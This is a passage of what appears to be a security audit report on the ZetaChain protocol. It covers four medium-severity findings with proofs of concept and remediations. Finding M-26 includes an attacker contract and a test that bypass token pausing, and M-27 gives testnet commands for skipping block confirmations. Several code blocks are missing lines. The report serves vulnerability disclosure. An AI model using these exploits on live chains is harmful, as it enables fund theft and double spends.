[M-25] Observer Can Temporarily Halt Chain

Submitted by ChristiansWhoHack


The process for changing the TSS address happens as follows:

  1. Observer is either added or slashed. This disables inbound calls and starts the kegen process.
  2. All TSS key holders vote on the TSS key. NOTE: this must be done by manually running a script or restarting the node.
  3. Each TSS key holders votes on the new public key to Zetachain.
  4. The admin calls MigrateFSSFunds to the new key. NOTE: this must be done MANUALLY by the admin.
  5. The TSS address must be updated on the connector and ERC20Custody contracts on all of the chains. NOTE: this must be done MANUALLY by the admin.
  6. Inbound transactions must be turned on again. NOTE: this must be done MANUALLY by the admin.

If a single observer gets slashed for any reason, the chain will be halted until steps 2-6 are manually done. Within the endblocker, we can see the code that will disable inbound CCTXs and restart the keygen process if the observer count is mismatched. This happens within the BeginBlocker process of the observer module.

	if totalObserverCountCurrentBlock == int(lastBlockObserverCount.Count) {


	k.SetKeygen(ctx, types.Keygen{BlockNumber: math.MaxInt64})

The count changes only when slashing occurs. The slashing happens automatically using the StakingHooks. Within the hook BeforeValidatorSlashed(), it checks to see if the user is underneath the specified threshold. If that’s true, then they will be removed.

	for _, mapper := range mappers {
		if  sdk.NewDecFromInt(resultingTokens).LT(obsParams.MinObserverDelegation) {
			mapper.ObserverList = CleanAddressList(mapper.ObserverList, accAddress.String())
			k.SetObserverMapper(ctx, mapper)

From the code above, it is clear that an observer going off line from slashing will restart the keygen process and halt the chain. This may happen on accident, such as the server going down from a power outage, or on purpose from a malicious validator.

Considering this requires all TSS voters to perform operations (currently 11 on Ethereum) and the administrator, there are a lot of points of failure here. If this happens, I would guess it would take 12 hours to get everything back into a working state. For a fairly common occurrence, this is a large amount of downtime.


One strategy would to simply remove the observer and keep moving on until a pre-determined date. Since the threshold for all of the keys is 2 out of 3, everyone would keep functioning normally until the change was made.

An additional strategy would be to automate this entire process. However, many of these operations are super sensitive, such as migrating admin keys. So, this may be intentional.

lumtis (ZetaChain) confirmed

[M-26] ZRC20 Token Pause Check Bypass

Submitted by ChristiansWhoHack, also found by berndartmueller

Ethermint runs hooks after the execution of a transaction. Currently, within the Zetachain setup, there are two modules using hooks: crosschain and fungible. The crosschain hook processes outgoing calls to withdraw for ZRC20 tokens and zeta sends. The fungible module checks to see if the ZRC20 token is paused or not.

When calling into the zEVM from the crosschain module on a cctx, the call is below the place where the hooks run; this means that the Ethermint hooks are not triggered. There is a call to processLogs from the crosschain module but there is no call to CheckZRC20Paused() function. If a token was paused, an attacker could circumvent the pausing protection by setting up a smart contract to execute on the onCrossChainCall() callback to trigger a withdrawal that should not be possible. The pausing may be used in events once a vulnerability is discovered. So, bypassing this assumed protection could have catastrophic consequences.

Proof of Concept

The proof of concept is a Cosmos SDK test that accesses the Withdrawal functionality within a CCTX.

  1. Add the following code to the file x/crosschain/keeper/gas_payment_test.go.
func TestZRC20PauseBypassTry2(t *testing.T) {

	// Initialize chain enough to use
	k, ctx, sdkk, zk := keepertest.CrosschainKeeper(t)
	msgServer := keeper.NewMsgServerImpl(*k)
	_ = msgServer

	// Set the chain ids we want to use to be valid
	params := observertypes.DefaultParams()
		ctx, params,

	// Validator setup
	validators := k.StakingKeeper.GetAllValidators(ctx)
	validatorAddress := validators[0].OperatorAddress
	valAddr, _ := sdk.ValAddressFromBech32(validatorAddress)
	addresstmp, err := sdk.AccAddressFromHexUnsafe(hex.EncodeToString(valAddr.Bytes()))
	validatorAddr := addresstmp.String()

	// Add validator to the observer list for voting
	chains := zk.ObserverKeeper.GetParams(ctx).GetSupportedChains()
	for _, chain := range chains {
		zk.ObserverKeeper.SetObserverMapper(ctx, &observertypes.ObserverMapper{
			ObserverChain: chain,
			ObserverList:  []string{validatorAddr},

	k.GetAuthKeeper().GetModuleAccount(ctx, fungibletypes.ModuleName)

	// Set the TSS to a random address for processing
	k.SetTSS(ctx, types.TSS{
		TssPubkey: "zetapub1addwnpepq28c57cvcs0a2htsem5zxr6qnlvq9mzhmm76z3jncsnzz32rclangr2g35p",

	// Setup system contracts on the zEVM
	deploySystemContracts(t, ctx, zk.FungibleKeeper, sdkk.EvmKeeper)

	chainID := getValidEthChainID(t)


		- Deploy ZRC20 contract
		- Pause the contract - https://www.zetachain.com/docs/architecture/modules/fungible/messages/#msgupdatezrc20pausedstatus
		- Deploy attacker contract that will interact with ZRC20 contract
		- Make a CCTX to call this contract
		- Attacker contract triggers event for ZRC20 things. Bypasses pausing.

	// Deploy a ZRC20 token for use later
	asset := sample.EthAddress().String()
	zrc20Addr, err := k.GetFungibleKeeper().DeployZRC20Contract(
		ctx, "ETH", "ETH", 18, chainID, 1, asset, big.NewInt(1000000000),
	fmt.Println(zrc20Addr, err)

	// Get the coin we just made and pause it.
	zrc20Coin, _ := k.GetFungibleKeeper().GetForeignCoins(ctx, zrc20Addr.String())
	assert.Equal(t, false, zrc20Coin.Paused)
	zrc20Coin.Paused = true 
	k.GetFungibleKeeper().SetForeignCoins(ctx, zrc20Coin)
	zrc20Coin, _ = k.GetFungibleKeeper().GetForeignCoins(ctx, zrc20Addr.String())
	assert.Equal(t, true, zrc20Coin.Paused)

	// Setup the gas tokens for a given chain and the price of the gas
	// 	systemAddr, _ := k.GetFungibleKeeper().GetSystemContract(ctx)
	k.GetFungibleKeeper().SetGasPrice(ctx, big.NewInt(chainID), big.NewInt(1))
	k.GetFungibleKeeper().SetGasCoin(ctx, big.NewInt(chainID), zrc20Addr)
		ctx, types.GasPrice{
			ChainId:     chainID,
			MedianIndex: 0,
			Prices:      []uint64{1},

	// Set the chain nonce for the outbound tx
	k.SetChainNonces(ctx, types.ChainNonces{
		Index:   "bsc_mainnet",
		ChainId: 56,
		Nonce:   0,
		// #nosec G701 always positive
		FinalizedHeight: uint64(ctx.BlockHeight()),
	k.SetPendingNonces(ctx, types.PendingNonces{
		NonceLow:  0,
		NonceHigh: 0,
		ChainId:   56,
		Tss:       "zetapub1addwnpepq28c57cvcs0a2htsem5zxr6qnlvq9mzhmm76z3jncsnzz32rclangr2g35p",

		// Deploy my smart contract. Simply calls the withdraw of a particular ZRC20 contract.
		pragma solidity 0.8.7;

		// https://github.com/code-423n4/2023-11-zetachain/blob/2834e3f85b2c7774e97413936018a0814c57d860/repos/protocol-contracts/contracts/zevm/interfaces/IZRC20.sol
		interface IZRC20 {
		    function totalSupply() external view returns (uint256);
		    function balanceOf(address account) external view returns (uint256);
		    function transfer(address recipient, uint256 amount) external returns (bool);
		    function allowance(address owner, address spender) external view returns (uint256);
		    function approve(address spender, uint256 amount) external returns (bool);
		    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
		    function deposit(address to, uint256 amount) external returns (bool);
		    function withdraw(bytes memory to, uint256 amount) external returns (bool);
		    function withdrawGasFee() external view returns (address, uint256);

		struct zContext {
		    bytes origin;
		    address sender;
		    uint256 chainID;

		interface zContract {
		    function onCrossChainCall(
		        zContext calldata context,
		        address zrc20,
		        uint256 amount,
		        bytes calldata message
		    ) external;

		contract MissingPauseHandling is zContract{

		    IZRC20 token;
		    constructor(address zrc20token){
		        token = IZRC20(zrc20token);

		    // Trigger the actuall event
		    function onCrossChainCall(
		        zContext calldata context,
		        address zrc20,
		        uint256 amount,
		        bytes calldata message
		    ) external override{
		        token.approve(address(token), 0xFFFFFFFFFFFFFFFFFFFFF);
		            abi.encodePacked(address(0xDeaDbeefdEAdbeefdEadbEEFdeadbeEFdEaDbeeF)), 1
	// My personal defined contract
	AttackerContract := &bind.MetaData{
		ABI: "[{\"inputs\":[{\"internalType\":\"address\",\"name\":\"zrc20token\",\"type\":\"address\"}],\"stateMutability\":\"nonpayable\",\"type\":\"constructor\"},{\"inputs\":[{\"components\":[{\"internalType\":\"bytes\",\"name\":\"origin\",\"type\":\"bytes\"},{\"internalType\":\"address\",\"name\":\"sender\",\"type\":\"address\"},{\"internalType\":\"uint256\",\"name\":\"chainID\",\"type\":\"uint256\"}],\"internalType\":\"struct zContext\",\"name\":\"context\",\"type\":\"tuple\"},{\"internalType\":\"address\",\"name\":\"zrc20\",\"type\":\"address\"},{\"internalType\":\"uint256\",\"name\":\"amount\",\"type\":\"uint256\"},{\"internalType\":\"bytes\",\"name\":\"message\",\"type\":\"bytes\"}],\"name\":\"onCrossChainCall\",\"outputs\":[],\"stateMutability\":\"nonpayable\",\"type\":\"function\"}]",
		Bin: "0x608060405234801561001057600080fd5b506040516107313803806107318339818101604052810190610032919061008d565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610108565b600081519050610087816100f1565b92915050565b6000602082840312156100a3576100a26100ec565b5b60006100b184828501610078565b91505092915050565b60006100c5826100cc565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600080fd5b6100fa816100ba565b811461010557600080fd5b50565b61061a806101176000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c8063de43156e14610030575b600080fd5b61004a600480360381019061004591906102ef565b61004c565b005b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b360008054906101000a900473ffffffffffffffffffffffffffffffffffffffff166a0fffffffffffffffffffff6040518363ffffffff1660e01b81526004016100d292919061042b565b602060405180830381600087803b1580156100ec57600080fd5b505af1158015610100573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061012491906102c2565b5060008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c701262673deadbeefdeadbeefdeadbeefdeadbeefdeadbeef6040516020016101869190610410565b60405160208183030381529060405260016040518363ffffffff1660e01b81526004016101b4929190610454565b602060405180830381600087803b1580156101ce57600080fd5b505af11580156101e2573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061020691906102c2565b505050505050565b60008135905061021d8161059f565b92915050565b600081519050610232816105b6565b92915050565b60008083601f84011261024e5761024d610568565b5b8235905067ffffffffffffffff81111561026b5761026a610563565b5b60208301915083600182028301111561028757610286610572565b5b9250929050565b6000606082840312156102a4576102a361056d565b5b81905092915050565b6000813590506102bc816105cd565b92915050565b6000602082840312156102d8576102d761057c565b5b60006102e684828501610223565b91505092915050565b60008060008060006080868803121561030b5761030a61057c565b5b600086013567ffffffffffffffff81111561032957610328610577565b5b6103358882890161028e565b95505060206103468882890161020e565b9450506040610357888289016102ad565b935050606086013567ffffffffffffffff81111561037857610377610577565b5b61038488828901610238565b92509250509295509295909350565b61039c816104a0565b82525050565b6103b36103ae826104a0565b61053f565b82525050565b60006103c482610484565b6103ce818561048f565b93506103de81856020860161050c565b6103e781610581565b840191505092915050565b6103fb816104e8565b82525050565b61040a816104fa565b82525050565b600061041c82846103a2565b60148201915081905092915050565b60006040820190506104406000830185610393565b61044d60208301846103f2565b9392505050565b6000604082019050818103600083015261046e81856103b9565b905061047d6020830184610401565b9392505050565b600081519050919050565b600082825260208201905092915050565b60006104ab826104be565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60006104f3826104de565b9050919050565b6000610505826104de565b9050919050565b60005b8381101561052a57808201518184015260208101905061050f565b83811115610539576000848401525b50505050565b600061054a82610551565b9050919050565b600061055c82610592565b9050919050565b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b60008160601b9050919050565b6105a8816104a0565b81146105b357600080fd5b50565b6105bf816104b2565b81146105ca57600080fd5b50565b6105d6816104de565b81146105e157600080fd5b5056fea26469706673582212201a9a9890e7959663d498b5cd67f81c095c01b6f6f2e4954ba9d7acbcaee5907464736f6c63430008070033",

	attackerContract, err := k.GetFungibleKeeper().DeployContract(ctx, AttackerContract, zrc20Addr)
	fmt.Println("Attacker contact:", attackerContract, err)

	// Trigger the event with a single vote
	msg := &types.MsgVoteOnObservedInboundTx{
		Creator:       validatorAddr,
		Sender:        "0x954598965C2aCdA2885B037561526260764095B8",
		SenderChainId: chainID,
		Receiver:      attackerContract.String(),
		ReceiverChain: 7000,
		Amount:        sdkmath.NewUintFromString("1"),
		Message:       "d97B1de3619ed2c6BEb3860147E30cA8A7dC9891", // TODO - do dynamically - don't hardcode
		InBlockHeight: 1,
		GasLimit:      1000000000,
		CoinType:      1,
		TxOrigin:      "0x954598965C2aCdA2885B037561526260764095B8",
		Asset:         "",
		EventIndex:    1,

	k.GetFungibleKeeper().DepositZRC20(ctx, zrc20Addr, attackerContract, big.NewInt(1000000000))

	// Trigger the call to the zEVM from the contract call
	res, err := msgServer.VoteOnObservedInboundTx(

	fmt.Println(res, err)

	// Look at outbound tx's
	cctxs := k.GetAllCrossChainTx(ctx)

  1. Run the following command to run this test:
    go test ./x/crosschain/keeper/gas_payment_test.go -run TestZRC20PauseBypassTry2 -v
  1. Notice that the zEVM call succeeds even though the ZRC20 token is paused.

Short Term Remediation

Add in the following code for user facing zEVM calls. For instance, evm_deposit.go should check whether or not the token was paused.

callReceipt := &ethtypes.Receipt{
    Logs: logs,
err = k.fungibleKeeper.CheckPausedZRC20(ctx, callReceipt)
if err != nil {
    return false, errors.Wrap(types.ErrCannotProcessWithdrawal, err.Error())

Long Term Remediation

The pausing check is currently happening after a zEVM call via hooks and not in the contract itself. Having use before a check is considered bad practice, since extra computation occurs. In this case, it appears that the added complexity having this check not in the smart contract led to the vulnerability.

Adding the pausing functionality to the smart contract makes it less complex and more visible to everyone involved. It is recommended to do this.

lumtis (ZetaChain) confirmed

0xean (Judge) decreased severity to Medium and commented:

I think this should be downgraded to Medium based on the C4 categorizations. As as I understand it currently, it doesn’t lead to a direct loss of funds.

[M-27] Inbound Tx Confirmation Bypass via Malicious Observer

Submitted by ChristiansWhoHack, also found by ChristiansWhoHack





When utilizing state from multiple blockchains, it is important that this information is finalized. If not, a block reorganization can occur. This is possible since some subset of nodes may have one chain but the other set will have another. When this happens, a double spend can occur. For instance, if node set A includes the transaction and is processed as the event occurring but then a block reorganization occurs going to node set B that does NOT include a transaction, then the funds were processed prematurely. Now, the user has funds in both locations. For more on this, read the post by Halborn. This finding is similar to the Outbound Block confirmation check missing but is different because there are in separate sections of code and one is outbound while the other is inbound (this one).

Zetachain has set amount of blocks that it must observe to be completed before it will be confirmed that a block occurred or not. After this threshold of new blocks has been met, it is presumed that no block reorganization will occur. In previous audits, the Bitcoin confirmation count was too low, leading to potential of double spend issues. When processing incoming transaction through the normal event handling, Zetachain verifies that enough blocks have passed.

It is possible to bypass the confirmation protection by using the InTxTracker functionality. The confirmation checks are completely missing for both Ethereum and Bitcoin clients when performing these event checks. Directly after seeing the event in the TxTracker queue, the events will be queried from the blockchain without verifying the amount of blocks that have passed. The regular event handling and TxTracker processing are implemented completely separately, even though they are very similar in nature.

To exploit this, the attacker must be an observer. This is because untrusted relayers must add in a proof, which requires the header to be at a certain point. In particular, the confirmation check is respected on the block header voting. However, an observer does not have to provide a proof; they can simply provide by TxHash and it will be added to the functionality. The observers are somewhat trusted entities but this is still a decentralized system. A malicious or compromised observer should not be able to forgo the confirmation checks entirely to lead the environment vulnerable to a double spend attack.

The result of this is that a malicious observer/compromised node could see a fork happening, add this to the Tracker, then profit from the reorganization that happens later. This would duplicate the funds; once on the specified destination from the CCTX and one in the owners wallet. Practically exploiting this is difficult though.

Proof of Concept

Actually implementing an exploit that causes a double spend by a block reorganization is extremely difficult to do in a test environment. As a result, we deemed that a sufficient way to write a proof of concept for this is to demonstrate that the CCTXs are being operated on even though not enough blocks have been passed. From this, it is easy to deduce that a block reorganization would result in stolen funds.

To prepare for the exploit, do the following:

  • Setup the Zetachain test environment. Instructions can be found at https://github.com/code-423n4/2023-11-zetachain/blob/main/repos/node/contrib/localnet/README.md.
  • Attach to the administrative function of the ETH node. This can be done with the following commands: sudo docker exec -it geth /bin/sh geth attach ipc://tmp/geth.ipc
  • Ensure that cast from Foundry and Zetacore are installed on the same machine. Otherwise, it’s not feasible to do this fast enough. This may require porting keys from the observer to the main machine or installing cast on the zetacore0 observer.
  • Follow along in the PoC video
  • Find the ETH TSS address. This can be found by grepping the orchestrator logs for ETH Address.
  • Send Ether to the TSS address. We will do this with Cast using the following command.

      cast send --value 1000007 <TSS ADDRESS> --private-key d87baf7bf6dc560a252596678c12e41f7d1682837f05b29d411bc3f78ae2c263
  • Quickly after sending this, add the transaction to the tx queue. This can be done with the following command: zetacored tx crosschain add-to-in-tx-tracker 1337 1 —from zetacored keys list --output json | jq '.[0].address' -r —yes —fees 10000azeta —chain-id athens_101-1
  • Go to the terminal with the geth admin connection setup. Run miner.stop() as fast as possible. If this is done fast enough, a single mined block is enough. Notice that this has paused the chain. To check this, you can run cast block-number and notice that the block number does not change.
  • Keep track of the amount of CCTXs being voted on. This can be done by calling the following command: zetacored query crosschain list-cctx -o json | jq ‘.CrossChainTx | length’
  • Notice that the length increases by 1 over time, which is the CCTX we just sent. This should NOT happen because the block confirmation has not been met. If a reorganization occurred at this point then a double spend could occur later.

Short Term Remediation

Respect the block confirmation limits on both Ethereum and Bitcoin for inbound transactions. Simply ensure that enough blocks have passed prior to acting on them.

This is done properly within the ObserveTxIn code but not in the InboundTracker code.

Long Term Remediation

The code between the InboundTracker and ObserveTxIn does almost the exact same parsing. The only difference is that the InboundTracker is told which transactions to look at while the latter looks at all transactions. The original was safe but the newer code is not.

To prevent these sorts of issues in the future, try to share the code between the two locations. This way, security issues are not repeated over and over again.

lumtis (ZetaChain) confirmed, but disagreed with severity and commented:

I would actually decrease the severity since it concerns malicious observer and doesn’t seem trivial to execute.

0xean (Judge) decreased severity to Medium

[M-28] UpdateSystemContract is not copying gasPriceByChainId state variable to the new upgraded which will halt ZRC20 token withdraw until system contract is updated accordingly

Submitted by dontonka




Zeta protocol allow to update SystemContract.sol using UpdateSystemContract function which require Admin Group 2 access (so the highest access).

There is a problem in this function which I consider Medium severity as it doesn’t update one key state variable gasPriceByChainId during the upgrade.

As shown in the code snippet below, it does update the two other state variable gasCoinZRC20ByChainId and gasZetaPoolByChainId by calling respectively setGasCoinZRC20 and setGasZetaPool, but missing the call to setGasPrice.


    	foreignCoins := k.GetAllForeignCoins(ctx)
    	tmpCtx, commit := ctx.CacheContext()
    	for _, fcoin := range foreignCoins {
    		zrc20Addr := ethcommon.HexToAddress(fcoin.Zrc20ContractAddress)
    		if zrc20Addr == (ethcommon.Address{}) {
    			k.Logger(ctx).Error("invalid zrc20 contract address", "address", fcoin.Zrc20ContractAddress)
    		_, err = k.CallEVM(tmpCtx, *zrc20ABI, types.ModuleAddressEVM, zrc20Addr, BigIntZero, nil, true, false, "updateSystemContractAddress", newSystemContractAddr)
    		if err != nil {
    			return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call zrc20 contract method updateSystemContractAddress (%s)", err.Error())
    		if fcoin.CoinType == common.CoinType_Gas {
    			_, err = k.CallEVM(tmpCtx, *sysABI, types.ModuleAddressEVM, newSystemContractAddr, BigIntZero, nil, true, false, "setGasCoinZRC20", big.NewInt(fcoin.ForeignChainId), zrc20Addr)
    			if err != nil {
    				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call system contract method setGasCoinZRC20 (%s)", err.Error())
    			_, err = k.CallEVM(tmpCtx, *sysABI, types.ModuleAddressEVM, newSystemContractAddr, BigIntZero, nil, true, false, "setGasZetaPool", big.NewInt(fcoin.ForeignChainId), zrc20Addr)
    			if err != nil {
    				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call system contract method setGasZetaPool (%s)", err.Error())


UpdateSystemContract doesn’t update gasPriceByChainId state variable on the new system contract instance which will have a temporary and unexpected negative impact after a system contract update as withdraw on all ZRC20 token will revert, so halted, until the situation is mitigated by Observers calling GasPriceVoter on all the supported chains.

Proof of Concept

I added the following unit test inside TestKeeper_UpdateSystemContract, which confirm that gasPriceByChainId is not being copied on the new system contract, as the last line of the test fail because require.Equal(t, big.NewInt(41), queryGasPrice(chainID1, contract)) since the amount returned is 0, instead of 41.

    	t.Run("can update the system contract including gas price XD", func(t *testing.T) {
    		k, ctx, sdkk, zk := keepertest.FungibleKeeper(t)
    		msgServer := keeper.NewMsgServerImpl(*k)
    		k.GetAuthKeeper().GetModuleAccount(ctx, types.ModuleName)
    		admin := sample.AccAddress()
    		setAdminPolicies(ctx, zk, admin, observertypes.Policy_Type_group2)

    		queryZRC20SystemContract := func(contract common.Address) string {
    			abi, err := zrc20.ZRC20MetaData.GetAbi()
    			require.NoError(t, err)
    			res, err := k.CallEVM(ctx, *abi, types.ModuleAddressEVM, contract, keeper.BigIntZero, nil, false, false, "SYSTEM_CONTRACT_ADDRESS")
    			require.NoError(t, err)
    			unpacked, err := abi.Unpack("SYSTEM_CONTRACT_ADDRESS", res.Ret)
    			require.NoError(t, err)
    			address, ok := unpacked[0].(common.Address)
    			require.True(t, ok)
    			return address.Hex()

    		queryGasPrice := func(chainID *big.Int, contract common.Address) *big.Int {
    			abi, err := systemcontract.SystemContractMetaData.GetAbi()
    			require.NoError(t, err)
    			res, err := k.CallEVM(ctx, *abi, types.ModuleAddressEVM, contract, keeper.BigIntZero, nil, false, false, "gasPriceByChainId", chainID)
    			require.NoError(t, err)
    			unpacked, err := abi.Unpack("gasPriceByChainId", res.Ret)
    			require.NoError(t, err)
    			gasPrice, ok := unpacked[0].(*big.Int)
    			require.True(t, ok)
    			return gasPrice

    		verifyState := func(contract common.Address, chainID1, chainID2 *big.Int, gas1, gas2 common.Address) {
    			foundGas1, err := k.QuerySystemContractGasCoinZRC20(ctx, chainID1)
    			require.NoError(t, err)
    			require.Equal(t, gas1, foundGas1)
    			foundGas2, err := k.QuerySystemContractGasCoinZRC20(ctx, chainID2)
    			require.NoError(t, err)
    			require.Equal(t, gas2, foundGas2)
    			require.Equal(t, contract.Hex(), queryZRC20SystemContract(gas1))
    			require.Equal(t, contract.Hex(), queryZRC20SystemContract(gas2))
    			require.Equal(t, big.NewInt(41), queryGasPrice(chainID1, contract))
    			require.Equal(t, big.NewInt(52), queryGasPrice(chainID2, contract))

    		chains := zetacommon.DefaultChainsList()
    		require.True(t, len(chains) > 1)
    		require.NotNil(t, chains[0])
    		require.NotNil(t, chains[1])
    		chainID1 := chains[0].ChainId
    		chainID2 := chains[1].ChainId

    		wzeta, factory, router, _, oldSystemContract := deploySystemContracts(t, ctx, k, sdkk.EvmKeeper)
    		gas1 := setupGasCoin(t, ctx, k, sdkk.EvmKeeper, chainID1, "foo", "foo")
    		gas2 := setupGasCoin(t, ctx, k, sdkk.EvmKeeper, chainID2, "bar", "bar")

    		// setupGasCoin is not filling gasPriceByChainId, doing it manually as follow
    		k.SetGasPrice(ctx, big.NewInt(chainID1), big.NewInt(41))
    		k.SetGasPrice(ctx, big.NewInt(chainID2), big.NewInt(52))

    		// verify everything is good on the current system contract.
    		verifyState(oldSystemContract, big.NewInt(chainID1), big.NewInt(chainID2), gas1, gas2)

    		// deploy a new system contracts
    		newSystemContract, err := k.DeployContract(ctx, systemcontract.SystemContractMetaData, wzeta, factory, router)
    		require.NoError(t, err)
    		require.NotEqual(t, oldSystemContract, newSystemContract)

    		// can update the system contract
    		_, err = msgServer.UpdateSystemContract(ctx, types.NewMsgUpdateSystemContract(admin, newSystemContract.Hex()))
    		require.NoError(t, err)

    		// can retrieve the system contract
    		sc, found := k.GetSystemContract(ctx)
    		require.True(t, found)
    		require.Equal(t, newSystemContract.Hex(), sc.SystemContract)

    		// verify everything is good on the new system contract.
    		verifyState(newSystemContract, big.NewInt(chainID1), big.NewInt(chainID2), gas1, gas2)

Test Output

=== RUN   TestKeeper_UpdateSystemContract
--- FAIL: TestKeeper_UpdateSystemContract (0.07s)
=== RUN   TestKeeper_UpdateSystemContract/can_update_the_system_contract_including_gas_price_XD
        	Error Trace:	/mnt/c/IX/GitProjects/platform-tools/ETH_course/C4/2023-11-zetachain/repos/node/x/fungible/keeper/msg_server_update_system_contract_test.go:61
        	Error:      	Not equal: 
        	            	expected: 41
        	            	actual  : 0
        	            	--- Expected
        	            	+++ Actual
        	            	@@ -2,4 +2,3 @@
        	            	  neg: (bool) false,
        	            	- abs: (big.nat) (len=1) {
        	            	-  (big.Word) 41
        	            	+ abs: (big.nat) {
        	Test:       	TestKeeper_UpdateSystemContract/can_update_the_system_contract_including_gas_price_XD
    --- FAIL: TestKeeper_UpdateSystemContract/can_update_the_system_contract_including_gas_price_XD (0.07s)

Now that this is confirmed, if we examine ZRC20::withdraw it will first call withdrawGasFee which will then call ISystem(SYSTEM_CONTRACT_ADDRESS).gasPriceByChainId(CHAIN_ID) which will return 0 as proven already by the unit test. As we can see after the condition will make this transaction revert as gasPrice == 0.

    function withdrawGasFee() public view override returns (address, uint256) {
        address gasZRC20 = ISystem(SYSTEM_CONTRACT_ADDRESS).gasCoinZRC20ByChainId(CHAIN_ID);
        if (gasZRC20 == address(0)) {
            revert ZeroGasCoin();
        uint256 gasPrice = ISystem(SYSTEM_CONTRACT_ADDRESS).gasPriceByChainId(CHAIN_ID);
        if (gasPrice == 0) {
            revert ZeroGasPrice();
        uint256 gasFee = gasPrice * GAS_LIMIT + PROTOCOL_FLAT_FEE;
        return (gasZRC20, gasFee);

I would recommend to fix the problem in UpdateSystemContract to include gasPriceByChainId as follow. These changes will make the unit test pass.

func (k msgServer) UpdateSystemContract(goCtx context.Context, msg *types.MsgUpdateSystemContract) (*types.MsgUpdateSystemContractResponse, error) {
	ctx := sdk.UnwrapSDKContext(goCtx)
	if msg.Creator != k.observerKeeper.GetParams(ctx).GetAdminPolicyAccount(zetaObserverTypes.Policy_Type_group2) {
		return nil, sdkerrors.Wrap(sdkerrors.ErrUnauthorized, "Deploy can only be executed by the correct policy account")
	newSystemContractAddr := ethcommon.HexToAddress(msg.NewSystemContractAddress)
	if newSystemContractAddr == (ethcommon.Address{}) {
		return nil, sdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, "invalid system contract address (%s)", msg.NewSystemContractAddress)

	// update contracts
	zrc20ABI, err := zrc20.ZRC20MetaData.GetAbi()
	if err != nil {
		return nil, sdkerrors.Wrapf(types.ErrABIGet, "failed to get zrc20 abi")
	sysABI, err := systemcontract.SystemContractMetaData.GetAbi()
	if err != nil {
		return nil, sdkerrors.Wrapf(types.ErrABIGet, "failed to get system contract abi")
+	sys, found := k.GetSystemContract(ctx)
+	if !found {
+		k.Logger(ctx).Error("system contract not found")
+	}
+	oldSystemContractAddress := sys.SystemContract
+	oldSystemContractAddr := ethcommon.HexToAddress(oldSystemContractAddress)
+	if oldSystemContractAddr == (ethcommon.Address{}) {
+		k.Logger(ctx).Error("invalid system contract address", "address", oldSystemContractAddress)
+		return nil, sdkerrors.Wrapf(types.ErrContractCall, "invalid system contract (%s)", err.Error())
+	}
	foreignCoins := k.GetAllForeignCoins(ctx)
	tmpCtx, commit := ctx.CacheContext()
	for _, fcoin := range foreignCoins {
		zrc20Addr := ethcommon.HexToAddress(fcoin.Zrc20ContractAddress)
		if zrc20Addr == (ethcommon.Address{}) {
			k.Logger(ctx).Error("invalid zrc20 contract address", "address", fcoin.Zrc20ContractAddress)
		_, err = k.CallEVM(tmpCtx, *zrc20ABI, types.ModuleAddressEVM, zrc20Addr, BigIntZero, nil, true, false, "updateSystemContractAddress", newSystemContractAddr)
		if err != nil {
			return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call zrc20 contract method updateSystemContractAddress (%s)", err.Error())
		if fcoin.CoinType == common.CoinType_Gas {
			_, err = k.CallEVM(tmpCtx, *sysABI, types.ModuleAddressEVM, newSystemContractAddr, BigIntZero, nil, true, false, "setGasCoinZRC20", big.NewInt(fcoin.ForeignChainId), zrc20Addr)
			if err != nil {
				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call system contract method setGasCoinZRC20 (%s)", err.Error())
			_, err = k.CallEVM(tmpCtx, *sysABI, types.ModuleAddressEVM, newSystemContractAddr, BigIntZero, nil, true, false, "setGasZetaPool", big.NewInt(fcoin.ForeignChainId), zrc20Addr)
			if err != nil {
				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call system contract method setGasZetaPool (%s)", err.Error())
+			res, err := k.CallEVM(ctx, *sysABI, types.ModuleAddressEVM, oldSystemContractAddr, BigIntZero, nil, false, false, "gasPriceByChainId", big.NewInt(fcoin.ForeignChainId))
+			if err != nil {
+				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call system contract method gasPriceByChainId (%s)", err.Error())
+			}
+			unpacked, err := sysABI.Unpack("gasPriceByChainId", res.Ret)
+			if err != nil {
+				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to unpack gasPriceByChainId response (%s)", err.Error())
+			}
+			gasPrice, ok := unpacked[0].(*big.Int)
+			if !ok {
+				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to convert gasPriceByChainId response (%s)", err.Error())
+			}
+			_, err = k.CallEVM(tmpCtx, *sysABI, types.ModuleAddressEVM, newSystemContractAddr, BigIntZero, nil, true, false, "setGasPrice", big.NewInt(fcoin.ForeignChainId), gasPrice)
+			if err != nil {
+				return nil, sdkerrors.Wrapf(types.ErrContractCall, "failed to call system contract method setGasZetaPool (%s)", err.Error())
+			}

-       sys, found := k.GetSystemContract(ctx)
-       if !found {
-               k.Logger(ctx).Error("system contract not found")
-       }
-       oldSystemContractAddress := sys.SystemContract
	sys.SystemContract = newSystemContractAddr.Hex()
	k.SetSystemContract(ctx, sys)
	err = ctx.EventManager().EmitTypedEvent(
			MsgTypeUrl:         sdk.MsgTypeURL(&types.MsgUpdateSystemContract{}),
			NewContractAddress: msg.NewSystemContractAddress,
			OldContractAddress: oldSystemContractAddress,
			Signer:             msg.Creator,
	if err != nil {
		k.Logger(ctx).Error("failed to emit event", "error", err.Error())
		return nil, sdkerrors.Wrapf(types.ErrEmitEvent, "failed to emit event (%s)", err.Error())
